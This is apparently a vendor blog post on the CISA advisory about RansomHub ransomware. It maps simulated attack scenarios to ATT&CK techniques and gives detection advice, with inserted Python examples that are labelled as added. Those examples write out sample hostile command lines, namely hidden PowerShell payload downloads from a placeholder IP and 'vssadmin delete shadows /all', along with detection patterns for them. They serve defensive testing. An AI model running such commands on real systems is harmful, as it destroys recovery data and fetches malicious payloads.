Response to CISA Advisory (AA24-242A): #StopRansomware: RansomHub Ransomware

AttackIQ has released a new assessment template in response to the CISA Advisory (AA24-242A) published on August 29, 2024, which disseminates known RansomHub ransomware IOCs and TTPs identified through FBI threat response activities and third-party reporting as recently as August 2024.

On August 29, 2024, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) released a Cybersecurity Advisory (CSA) to disseminate known RansomHub ransomware IOCs and TTPs that have been identified through FBI threat response activities and third-party reporting as recently as August 2024.

This joint CSA is a continuation of CISA’s ongoing #StopRansomware effort to arm defenders with the intelligence they need to combat different ransomware variants and ransomware threat actors.

RansomHub, formerly known as Cyclops and Knight, is a ransomware strain operated under the Ransomware-as-a-Service (RaaS) business model that has been active since at least February 2024.

RansomHub began its history as Cyclops ransomware around May 2023 and gained notoriety for being capable of infecting all major operating systems, including Windows, Linux, and macOS. On July 27, 2023, Cyclops operators announced via their web portal the roll-out of version 2.0 in conjunction with the rebranding to Knight Ransomware. Almost six months later, in February 2024, Knight was rebranded as RansomHub. Since then, it has positioned itself as an efficient and successful service model while recently attracting high-profile affiliates of other prominent variants such as LockBit and ALPHV.

Since its inception, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors.

The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims. The ransom note dropped during encryption does not generally include an initial ransom demand or payment instructions. Instead, the note provides victims with a client ID and instructs them to contact the ransomware group via a unique .onion URL. The ransom note typically gives victims between three and 90 days to pay the ransom (depending on the affiliate) before the ransomware group publishes their data on the RansomHub Tor data leak site.

AttackIQ has released a new assessment template that includes the post-compromise Tactics, Techniques and Procedures (TTPs) exhibited by RansomHub during its latest activities to help customers validate their security controls and their ability to defend against sophisticated threats.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against the behaviors exhibited by a threat that continues to conduct worldwide ransomware activities.
  • Assess their security posture against activities focused on both encryption and exfiltration of sensitive information.
  • Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups that are currently focused on ransomware activities.

[CISA AA24-242A] #StopRansomware: RansomHub Ransomware

This assessment template emulates the post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by RansomHub affiliates during their latest activities.

The assessment template is divided into tactics, grouping the techniques and implementations used by affiliates at each stage of their activities.

1. Execution

Consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, such as exploring a network or stealing data.

BITS Jobs (T1197): This scenario executes bitsadmin to create a BITS job and configure it to download a remote payload. Background Intelligent Transfer Service (BITS) is a native mechanism used by legitimate applications to use a system’s idle bandwidth to retrieve files without disrupting other applications.

Windows Management Instrumentation (WMI) (T1047): This scenario executes a Windows Management Instrumentation (WMI) command. WMI is a native Windows administration feature that provides a method for accessing Windows system components.

2. Persistence

Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Create Account: Local Account (T1136.001): This scenario creates a local account using net user.

3. Defense Evasion

Consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.

Indicator Removal: Clear Windows Event Logs (T1070.001): The scenario uses the wevtutil.exe binary to clear event logs from the system.

Masquerading: Match Legitimate Name or Location (T1036.005): Renames an executable to rundll32.exe and executes it from the %TEMP% directory.

4. Credential Access

Consists of techniques for stealing credentials like account names and passwords.

OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes for Windows accounts.

5. Discovery

Consists of techniques that adversaries use to discover information related to the compromised environment.

System Information Discovery (T1082): This scenario calls the GetSystemInfo Windows API to retrieve information about the system, such as the processor architecture and processor count.

System Information Discovery (T1082): This scenario calls the GetEnvironmentStrings Windows API to print all the environment variables. These variables are often used to fingerprint a system using expected environment variables such as OS, PROCESSOR_ARCHITECTURE, or USERNAME.

System Information Discovery (T1082): This scenario will call the GetComputerNameA Windows API to enumerate the computer name.

Peripheral Device Discovery (T1120): This scenario retrieves the system’s logical drive letters using the GetLogicalDriveStringsW API call.

File and Directory Discovery (T1083): This scenario uses the FindFirstFileW, FindNextFileW, and GetFileSizeEx Windows API calls to enumerate the file system.

Process Discovery (T1057): This scenario uses the Windows API to retrieve a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process entry with Process32FirstW and Process32NextW.

Network Service Discovery (T1046): This scenario uses nmap to identify hosts that may be remotely accessible to the attacker by scanning for ports 139, 389, 445, 636 and 3389.

Windows Management Instrumentation (WMI) (T1047): This scenario executes the WMI command wmic path Win32_ShadowCopy to gather shadow copy information.

6. Lateral Movement

Consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts.

Remote Services: Remote Desktop Protocol (T1021.001): This scenario attempts to move laterally within a network using the Remote Desktop Protocol (RDP).

7. Command and Control

Consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection.

Ingress Tool Transfer (T1105): Two scenarios download a known malicious payload, one to memory only and one saved to disk, to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.

8. Exfiltration

Consists of techniques that adversaries may use to steal data from your network. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.

Exfiltration Over C2 Channel (T1041): This scenario simulates a data exfiltration attack where a pre-generated text file containing Windows system profiling data is sent via an HTTP POST request to an AttackIQ controlled test server.

9. Impact

Consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes.

Inhibit System Recovery (T1490): This scenario executes the vssadmin.exe utility to delete a recent Volume Shadow Copy created by the assessment template.

Inhibit System Recovery (T1490): This scenario executes the wmic.exe utility to delete a recent Volume Shadow Copy created by the assessment template.
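The two Inhibit System Recovery scenarios above delete only a shadow copy that the template itself created. The block below, an added example that is not part of the AttackIQ template or the advisory, shows how a test harness keeps that scope: list shadow copies before and after creating one, take the single new ID, and build a vssadmin or WMIC deletion that names that ID rather than using /All. The two `vssadmin list shadows` listings are constructed samples; the GUIDs and the host name WS01 are made up, and the live path (run_live) assumes an elevated Windows prompt.

```python
"""Added example (not AttackIQ's code): scoped shadow copy deletion for the
T1490 impact scenarios. LISTING_BEFORE / LISTING_AFTER are constructed
samples of `vssadmin list shadows` output with made-up GUIDs and host name."""
from __future__ import annotations

import platform
import re
import subprocess

LISTING_BEFORE = r"""vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {1a2b3c4d-0000-4000-8000-000000000001}
   Contained 1 shadow copies at creation time: 9/1/2024 8:00:12 AM
      Shadow Copy ID: {6f7e8d9c-0000-4000-8000-0000000000aa}
         Original Volume: (C:)\\?\Volume{0f1e2d3c-0000-4000-8000-0000000000cc}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: WS01
         Service Machine: WS01
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential
"""

# Same host after the scenario created its own copy: the pre-existing entry plus one more.
LISTING_AFTER = LISTING_BEFORE + r"""
Contents of shadow copy set ID: {1a2b3c4d-0000-4000-8000-000000000002}
   Contained 1 shadow copies at creation time: 9/1/2024 8:05:47 AM
      Shadow Copy ID: {6f7e8d9c-0000-4000-8000-0000000000bb}
         Original Volume: (C:)\\?\Volume{0f1e2d3c-0000-4000-8000-0000000000cc}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
         Originating Machine: WS01
         Service Machine: WS01
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential
"""

# "Shadow Copy ID:" lines only; the "shadow copy set ID" header is a different object.
_SHADOW_ID = re.compile(r"Shadow Copy ID:\s*(\{[0-9a-fA-F-]{36}\})")


def parse_shadow_ids(listing: str) -> list[str]:
    """Shadow copy IDs in the order vssadmin prints them."""
    return _SHADOW_ID.findall(listing)


def new_shadow_id(before: list[str], after: list[str]) -> str:
    """The single ID that appeared between the two listings; refuse to guess otherwise."""
    added = [sid for sid in after if sid not in before]
    if len(added) != 1:
        raise RuntimeError(f"expected exactly one new shadow copy, found {len(added)}")
    return added[0]


def vssadmin_delete_cmd(shadow_id: str) -> list[str]:
    """Scoped deletion for the vssadmin.exe scenario: one ID, never /All."""
    return ["vssadmin.exe", "delete", "shadows", f"/Shadow={shadow_id}", "/Quiet"]


def wmic_delete_cmd(shadow_id: str) -> list[str]:
    """Scoped deletion for the wmic.exe scenario: WQL filter on the ID."""
    return ["wmic.exe", "shadowcopy", "where", f"ID='{shadow_id}'", "delete"]


def run_live(volume: str = "C:", use_wmic: bool = False) -> str:
    """Windows-only and needs elevation; returns the ID that was created and deleted.
    Assumed, untested live path: wmic is deprecated on current Windows releases but
    is still the simplest way to create a copy on client SKUs."""
    if platform.system() != "Windows":
        raise RuntimeError("this scenario only runs on Windows")

    def listing() -> str:
        return subprocess.run(["vssadmin.exe", "list", "shadows"],
                              capture_output=True, text=True, check=True).stdout

    before = parse_shadow_ids(listing())
    subprocess.run(["wmic.exe", "shadowcopy", "call", "create", f"Volume={volume}\\"], check=True)
    sid = new_shadow_id(before, parse_shadow_ids(listing()))
    subprocess.run(wmic_delete_cmd(sid) if use_wmic else vssadmin_delete_cmd(sid), check=True)
    return sid


if __name__ == "__main__":
    sid = new_shadow_id(parse_shadow_ids(LISTING_BEFORE), parse_shadow_ids(LISTING_AFTER))
    print("would run:", " ".join(vssadmin_delete_cmd(sid)))
```

The diff of the two listings is what protects the host: if the listing shows zero or more than one new copy (for instance a scheduled backup ran in between), the harness refuses to delete anything rather than picking the wrong one.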

Opportunities to Expand Emulation Capabilities

In addition to the released assessment template, AttackIQ recommends the following existing scenarios to extend the emulation of the capabilities exhibited in this advisory.

  • Lateral Movement Through PAExec: This scenario simulates lateral movement within a network using PAExec, an open-source version of PSExec.
  • Domain Controller Remote System Discovery via PowerShell Script: This scenario uses PowerShell to identify a list of active domain computers, displaying their names, hostnames, and installed operating systems.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Review CISA’s Patching and Detection Recommendations:

CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations first, with the goal of adapting them to your environment and determining whether you are already affected, before reviewing the assessment results.

2. Ingress Tool Transfer (T1105):

Adversaries often rely heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.

2a. Detection

The following signature can help identify when native utilities are being used to download malicious payloads. It keys on PowerShell download cmdlets or .NET WebClient download methods launched with a hidden window; the window-style condition keeps noise down but also means downloads run without it are not caught.

PowerShell Example:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest" OR "DownloadData" OR "DownloadFile") AND "Hidden")

2b. Mitigation

MITRE ATT&CK lists mitigation recommendations for Ingress Tool Transfer (T1105) on the technique’s page.

3. Inhibit System Recovery (T1490):

Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.

3a. Detection

Deletion of Volume Shadow Copies is usually one of the first impact steps and can be detected from process command-line activity. The deleting utility may be logged as the created process itself (vssadmin.exe or wmic.exe) rather than only as a command under cmd.exe or powershell.exe, so match on the command line rather than the parent alone.

Process Name == (cmd.exe OR powershell.exe OR vssadmin.exe OR wmic.exe)
Command Line CONTAINS ("vssadmin" AND "Delete Shadows")
OR Command Line CONTAINS ("WMIC" AND "shadowcopy" AND "delete")
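The signatures in sections 2a and 3a, implemented as detection logic and run over constructed process-creation events. This is an added example, not AttackIQ’s code or a rule supplied by the advisory; the URL (198.51.100.7, a documentation address), file paths and the shadow copy GUID in the sample events are made up, and the image list for T1490 is widened to include vssadmin.exe and wmic.exe themselves, since those are the created processes a Sysmon or 4688 event actually records.

```python
"""Added example (not AttackIQ's code): the 2a and 3a command-line detections as
functions, run over constructed process-creation events. The URL, paths and GUID
in SAMPLE_EVENTS are made up."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """The two fields every process-creation source carries (Sysmon EID 1, Security 4688)."""
    image: str
    command_line: str


def _image_name(path: str) -> str:
    """'C:\\Windows\\System32\\cmd.exe' -> 'cmd.exe', case-folded for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Section 2a: PowerShell download primitives launched with a hidden window.
# Word boundaries stop "iwr" matching inside unrelated tokens.
_DOWNLOADER = re.compile(
    r"\b(iwr|invoke-webrequest|downloaddata|downloadfile|downloadstring)\b", re.I)
_HIDDEN = re.compile(r"\bhidden\b", re.I)
T1105_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def detect_t1105(ev: ProcessEvent) -> bool:
    if _image_name(ev.image) not in T1105_IMAGES:
        return False
    cl = ev.command_line
    return bool(_DOWNLOADER.search(cl) and _HIDDEN.search(cl))


# Section 3a: shadow copy deletion. vssadmin.exe and wmic.exe are included as
# images because the deleting utility is itself the created process in the log.
T1490_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "vssadmin.exe", "wmic.exe"}


def detect_t1490(ev: ProcessEvent) -> bool:
    if _image_name(ev.image) not in T1490_IMAGES:
        return False
    cl = " ".join(ev.command_line.split()).lower()  # collapse runs of whitespace
    via_vssadmin = "vssadmin" in cl and "delete shadows" in cl
    via_wmic = "wmic" in cl and "shadowcopy" in cl and "delete" in cl
    return via_vssadmin or via_wmic


def classify(ev: ProcessEvent) -> list[str]:
    """ATT&CK technique IDs the event matches, in a stable order."""
    hits = []
    if detect_t1105(ev):
        hits.append("T1105")
    if detect_t1490(ev):
        hits.append("T1490")
    return hits


# Constructed events: a documentation IP, made-up paths and a made-up GUID.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -WindowStyle Hidden -Command "IWR http://198.51.100.7/a.bin -OutFile C:\Users\Public\a.bin"'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadData('http://198.51.100.7/p.bin')"),
    # Same download without a hidden window: the 2a rule does not fire on it.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -Command Invoke-WebRequest http://198.51.100.7/a.bin -OutFile a.bin"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe /c vssadmin delete shadows /all /quiet"),
    ProcessEvent(r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin.exe delete shadows /Shadow={6f7e8d9c-0000-4000-8000-0000000000bb} /Quiet"),
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe shadowcopy delete"),
    # Listing copies is reconnaissance (the T1047 discovery scenario), not deletion.
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe shadowcopy list brief"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs"),
]


def scan(events: list[ProcessEvent] = SAMPLE_EVENTS) -> list[tuple[str, list[str]]]:
    """(command line, matched techniques) for every event that matched at least one rule."""
    return [(ev.command_line, hits) for ev in events if (hits := classify(ev))]


if __name__ == "__main__":
    for cmd, hits in scan():
        print(",".join(hits), cmd)
```

Running it prints the five matching events. The third sample shows the window-style condition’s blind spot (a non-hidden Invoke-WebRequest is not matched), and an abbreviated `-w h` would also slip past the `hidden` token, so treat the 2a rule as a high-confidence starting point rather than full coverage of T1105.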

3b. Mitigation

MITRE ATT&CK lists mitigation recommendations for Inhibit System Recovery (T1490) on the technique’s page.

Wrap-up

In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against an extortive threat. With data generated from continuous testing and the use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against sophisticated ransomware actors.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.